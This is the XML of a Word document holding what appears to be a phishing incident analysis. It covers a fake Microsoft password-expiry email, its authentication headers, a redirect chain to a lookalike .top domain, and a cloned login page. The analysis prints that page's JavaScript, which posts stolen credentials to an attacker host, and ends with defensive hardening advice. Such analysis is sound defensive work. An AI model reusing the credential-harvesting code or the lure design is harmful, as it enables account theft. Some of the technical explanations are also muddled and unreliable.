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xe9u7r72i5ln" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Phishing Exemplar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u78ftznz9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high-priority user in the Finance department reported a suspicious email. The email claims the user’s password will expire in 4 hours and provides a link to "Validate Current Credentials" to bypass the expiration.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xzs46dsru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A: The Phishing Email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gave me the technical metadata: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Reported Sender:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Office 365 Security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&lt;no-reply@security-microsoft.net&gt;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Final Notice: Password Expiration for [User Email]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Feb 04, 2026, 09:14 AM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Headers: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Authentication-Results: spf=pass; dkim=none; dmarc=fail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asked Google if the sender’s domain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no-reply@security-microsoft.net</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) is legitimate. Google replied that no, the sender’s domain is essentially a scam. Official Microsoft emails come from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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> domain.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 then researched why the Sender Policy Framework (SPF) passed and the Domain-based Message Authentication, Reporting, and Conformance (DMARC) failed. As it turns out, the attacker set up a server to authorize them to send emails from their domain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security-microsoft.net</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">). However, since we know that official Microsoft emails use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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> domain, the DMARC failed because the official domain and the attacker’s domain did not match.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Unfortunately, the user in the Finance department could not give me the email body. However, based on that, I tried to recreate the email, as shown in Image 1:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000D">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_vj90bvqpu0fo" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IMAGE 1: THE PHISHING EMAIL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53088" cy="56530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565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Based on this, there are several red flags that stand out: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domain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no-reply@security-microsoft.net</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">): As discussed earlier, legitimate emails come from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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> domain.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greeting: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This email does not state the user’s name. It uses a generic greeting “Dear User Name”. Scammers might not know the user’s name.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Typos, misspellings, and grammatical errors</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: There are numerous examples of them. For example, “If </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">you not</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> validate your credentials” instead of “If you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not validate your credentials”; “your access 3065…” instead of “your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ccess </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">365</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">…”.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f7g2xppw9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B: The Redirection Chain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clicking t</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">he "Validate Credentials" button, I realized that it does not lead directly to a login page. It utilizes a series of redirects to evade automated URL scanners.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URL Path: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Click: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https://t.ly/secure-redirect-8821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 Hop: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https://storage.googleapis.com/hacked-bucket-99/index.html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https://login.microsoftonline.net.security-auth.top/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Given this, I immediately saw that ‘Intermediate Hop’ link was redirected to the Google APIs page. My research led me to one conclusion: the attacker uses this as an ‘obfuscation technique’.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we know, the domain that the hacker used is ‘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security-microsoft.net</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">’. Upon further analysis of the ‘Intermediate Hop’ Google API link, I realized that the attacker owned a Google domain which is cheap and easy to set up. Because of the fact that Google-owned domains are critical for businesses, there is little to no reason why security software should block them or flag them as ‘malicious’.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for the ‘Final Destination’ link, I saw that the attacker used the link because he/she knows about us as readers - we read from left to right. Again, the domain that the hacker used is ‘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security-microsoft.net</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">’. Breaking down the website, we get the following result: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Top-Level Domain (TLD): .top. When I researched the TLD, I found out that it’s commonly used by cybercriminals. Given the fact that the attacker created a cheap, Google-owned domain, it makes sense that the attacker would use a generic TLD like .top.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registered domain: security-auth. That’s the actual domain owned by the attacker.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subdomain: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login.microsoftonline.net</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Further research led me to the fact that anything to the left of the registered domain is part of the subdomain. The ‘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login.microsoft.online.net</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">’ portion of the link has no affiliation with Microsoft and is only there to make the URL look authentic to a person.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Based on that, we immediately see that the link is malicious. The user sees ‘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login.microsoftonline.net</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">’ and believes it to be part of Microsoft, even though the link has zero affiliation with Microsoft because of the actual root domain (security-auth.top). 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p9d9mcp0m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C: The Credential Harvesting Page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final landing page is a pixel-perfect clone of the Microsoft login portal. I noticed the following </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Behavioral Observations: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page pre-fills the user’s email address via a Base64 encoded string in the URL.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password is entered, the page displays a "Loading..." spinner for 3 seconds before redirecting the user to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office.com</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> homepage.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000024">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_rftgtidrxud4" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IMAGE 2: Fake Login Form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42928" cy="31429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928" cy="3142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after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_4fw2dtlt1pms" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IMAGE 3: The Actual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office.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Homepage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45936" cy="29360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936" cy="293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images above, the redirect to the actual homepage is a tactic used by attackers to fool users. If the user lands on the real login page, he/she would believe that the first attempt ‘didn’t count’, not knowing that the credentials are already in the hands of the attacker.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for the form, there is an Event Listener that is used. Modern phishing software doesn’t use the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attribute in the HTML. The code is below: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document.getElementById("login-form").addEventListener("submit", function(e) {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e.preventDefault(); // Stops the page from actually submitting normally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data = { user: emailField, pass: passField };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fetch('https://malicious-telemetry.top/collect', { method: 'POST', body: JSON.stringify(data) });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the code, the data is being sent to a website ‘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https://malicious-telemetry.top/collect</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">’. This is the site used by the attacker to gain a user’s credentials.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nedop2727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Response &amp; Hardening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Based on what we learned about phishing, the company could consider taking the following steps to make sure that phishing attacks never happen again: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should upgrade their DMARC policy to ‘p=quarantine’ or ‘p=reject’. It probably set up the DMARC policy to ‘p=none’, thereby allowing the email to be sent. By setting up the DMARC policy to “p=quarantine” or “p=reject”, the user won’t receive the email in their inbox (given that the user doesn’t check his/her spam folder that often). However, I would highly recommend that the company upgrades its DMARC policy to “p=reject”. This means that only verified emails get sent to the inbox, and this policy might be the only way to prevent phishing attacks.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should retire the SMS-based Multi-Factor Authentication method and use the more secure, Phishing-Resistant MFA method. By doing so, the hardware key would notice that there is a difference between the fake link and the real link.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mailto:no-reply@security-microsoft.net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malicious-telemetry.top/collect" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://security-microsoft.net" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://microsof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icrosoft.com" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://login.microsoftonline.net" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://security-microsoft.net" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://login.microsoftonline.net" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://login.microsoft.online.net" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://office.com" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:no-reply@security-microsoft.net" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://microsoft.com" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://security-microsoft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